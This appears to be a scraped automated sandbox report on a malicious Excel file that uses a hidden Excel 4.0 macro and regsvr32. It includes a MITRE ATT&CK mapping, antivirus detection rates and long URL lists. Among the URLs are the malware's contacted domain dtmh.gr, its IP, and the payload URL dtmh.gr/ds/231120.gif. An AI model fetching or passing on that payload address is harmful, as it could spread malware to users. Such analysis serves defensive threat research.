    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: regsvr32.exe, 00000009.00000002.725430487.0000000000E40000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
    Source: regsvr32.exe, 00000009.00000002.725430487.0000000000E40000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
    Source: regsvr32.exe, 00000009.00000002.725430487.0000000000E40000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
    Source: regsvr32.exe, 00000009.00000002.725430487.0000000000E40000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Yara detected hidden Macro 4.0 in ExcelShow sources
    Source: Yara matchFile source: document-1411290183.xls, type: SAMPLE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting21DLL Side-Loading1Process Injection1Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsDLL Side-Loading1Process Injection1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Extra Window Memory Injection1Scripting21Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Regsvr321NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonExtra Window Memory Injection1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    document-1411290183.xls34%VirustotalBrowse
    document-1411290183.xls11%MetadefenderBrowse
    document-1411290183.xls4%ReversingLabsDocument-Word.Trojan.Heuristic

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    dtmh.gr1%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://wus2-000.contentsync.0%URL Reputationsafe
    https://wus2-000.contentsync.0%URL Reputationsafe
    https://wus2-000.contentsync.0%URL Reputationsafe
    https://wus2-000.contentsync.0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
    https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://officeci.azurewebsites.net/api/0%VirustotalBrowse
    https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://wus2-000.pagecontentsync.0%URL Reputationsafe
    https://wus2-000.pagecontentsync.0%URL Reputationsafe
    https://wus2-000.pagecontentsync.0%URL Reputationsafe
    https://wus2-000.pagecontentsync.0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://asgsmsproxyapi.azurewebsites.net/0%VirustotalBrowse
    https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
    https://dtmh.gr/ds/231120.gif0%URL Reputationsafe
    https://dtmh.gr/ds/231120.gif0%URL Reputationsafe
    https://dtmh.gr/ds/231120.gif0%URL Reputationsafe
    https://dtmh.gr/ds/231120.gif0%URL Reputationsafe
    https://ncus-000.contentsync.0%URL Reputationsafe
    https://ncus-000.contentsync.0%URL Reputationsafe
    https://ncus-000.contentsync.0%URL Reputationsafe
    https://ncus-000.contentsync.0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
    https://directory.services.0%URL Reputationsafe
    https://directory.services.0%URL Reputationsafe
    https://directory.services.0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    dtmh.gr
    78.46.235.88
    truefalseunknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://api.diagnosticssdf.office.com98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
      high
      https://login.microsoftonline.com/98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
        high
        https://shell.suite.office.com:144398B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
          high
          https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
            high
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
              high
              https://cdn.entity.98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://api.addins.omex.office.net/appinfo/query98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                high
                https://wus2-000.contentsync.98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                https://clients.config.office.net/user/v1.0/tenantassociationkey98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                  high
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                    high
                    https://powerlift.acompli.net98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://rpsticket.partnerservices.getmicrosoftkey.com98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://lookup.onenote.com/lookup/geolocation/v198B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                      high
                      https://cortana.ai98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                        high
                        https://cloudfiles.onenote.com/upload.aspx98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                          high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                            high
                            https://entitlement.diagnosticssdf.office.com98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                              high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                high
                                https://api.aadrm.com/98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://ofcrecsvcapi-int.azurewebsites.net/98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                  high
                                  https://api.microsoftstream.com/api/98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                    high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                      high
                                      https://cr.office.com98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                        high
                                        https://portal.office.com/account/?ref=ClientMeControl98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                          high
                                          https://ecs.office.com/config/v2/Office98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                            high
                                            https://graph.ppe.windows.net98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                              high
                                              https://res.getmicrosoftkey.com/api/redemptionevents98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://powerlift-frontdesk.acompli.net98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://tasks.office.com98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                high
                                                https://officeci.azurewebsites.net/api/98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://sr.outlook.office.net/ws/speech/recognize/assistant/work98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                  high
                                                  https://store.office.cn/addinstemplate98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://wus2-000.pagecontentsync.98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://outlook.office.com/autosuggest/api/v1/init?cvid=98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                    high
                                                    https://globaldisco.crm.dynamics.com98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                      high
                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                        high
                                                        https://store.officeppe.com/addinstemplate98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://dev0-api.acompli.net/autodetect98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.odwebp.svc.ms98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://api.powerbi.com/v1.0/myorg/groups98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                          high
                                                          https://web.microsoftstream.com/video/98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                            high
                                                            https://graph.windows.net98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                              high
                                                              https://dataservice.o365filtering.com/98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://officesetup.getmicrosoftkey.com98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://analysis.windows.net/powerbi/api98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                                high
                                                                https://prod-global-autodetect.acompli.net/autodetect98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://outlook.office365.com/autodiscover/autodiscover.json98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                                  high
                                                                  https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                                    high
                                                                    https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                                      high
                                                                      https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                                        high
                                                                        https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                                          high
                                                                          https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                                            high
                                                                            http://weather.service.msn.com/data.aspx98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                                              high
                                                                              https://apis.live.net/v5.0/98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                                                high
                                                                                https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                                                  high
                                                                                  https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                                                    high
                                                                                    https://management.azure.com98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                                                      high
                                                                                      https://outlook.office365.com98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                                                        high
                                                                                        https://incidents.diagnostics.office.com98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                                                          high
                                                                                          https://clients.config.office.net/user/v1.0/ios98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                                                            high
                                                                                            https://insertmedia.bing.office.net/odc/insertmedia98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                                                              high
                                                                                              https://o365auditrealtimeingestion.manage.office.com98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                                                                high
                                                                                                https://outlook.office365.com/api/v1.0/me/Activities98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                                                                  high
                                                                                                  https://api.office.net98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                                                                    high
                                                                                                    https://incidents.diagnosticssdf.office.com98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                                                                      high
                                                                                                      https://asgsmsproxyapi.azurewebsites.net/98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                                                                      • 0%, Virustotal, Browse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://clients.config.office.net/user/v1.0/android/policies98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                                                                        high
                                                                                                        https://entitlement.diagnostics.office.com98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                                                                          high
                                                                                                          https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                                                                            high
                                                                                                            https://autodiscover-s.outlook.com98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                                                                              high
                                                                                                              https://storage.live.com/clientlogs/uploadlocation98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                                                                                high
                                                                                                                https://dtmh.gr/ds/231120.gifdocument-1411290183.xlsfalse
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                https://templatelogging.office.com/client/log98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                                                                                  high
                                                                                                                  https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                                                                                    high
                                                                                                                    https://management.azure.com/98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                                                                                      high
                                                                                                                      https://ncus-000.contentsync.98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      https://login.windows.net/common/oauth2/authorize98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                                                                                        high
                                                                                                                        https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        https://graph.windows.net/98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                                                                                          high
                                                                                                                          https://api.powerbi.com/beta/myorg/imports98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                                                                                            high
                                                                                                                            https://devnull.onenote.com98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                                                                                              high
                                                                                                                              https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                                                                                                high
                                                                                                                                https://messaging.office.com/98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://augloop.office.com/v298B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://skyapi.live.net/Activity/98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://clients.config.office.net/user/v1.0/mac98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://dataservice.o365filtering.com98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://onedrive.live.com98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://ovisualuiapp.azurewebsites.net/pbiagave/98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            https://visio.uservoice.com/forums/368202-visio-on-devices98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://directory.services.98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://login.windows-ppe.net/common/oauth2/authorize98B0119A-1406-4C2B-A22D-9268E679C45C.0.drfalse
                                                                                                                                                high
